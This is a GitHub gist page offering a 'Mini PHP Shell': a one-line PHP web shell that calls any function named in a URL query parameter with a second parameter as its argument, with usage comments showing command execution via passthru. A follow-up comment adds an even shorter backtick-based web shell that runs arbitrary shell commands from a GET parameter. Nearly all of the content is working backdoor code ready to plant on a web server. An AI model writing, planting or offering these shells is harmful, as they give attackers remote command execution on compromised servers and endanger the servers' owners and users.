Skip to content

Instantly share code, notes, and snippets.

@proclnas
Forked from btoews/mps.php
Created March 6, 2017 14:10
Show Gist options
  • Save proclnas/4456b1b90de397fd14d74bb7e5be20f2 to your computer and use it in GitHub Desktop.
Save proclnas/4456b1b90de397fd14d74bb7e5be20f2 to your computer and use it in GitHub Desktop.
Mini PHP Shell
//(c) mastahyeti
//mini php shell
//usage: http://example.com?1=function_name&2=function_arguments
//example: http://example.com?1=passthru&2=ls
<? $_GET[1]($_GET[2]) ?>
@proclnas
Copy link
Author

proclnas commented Mar 6, 2017

<?=@`$_GET[c]`;

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment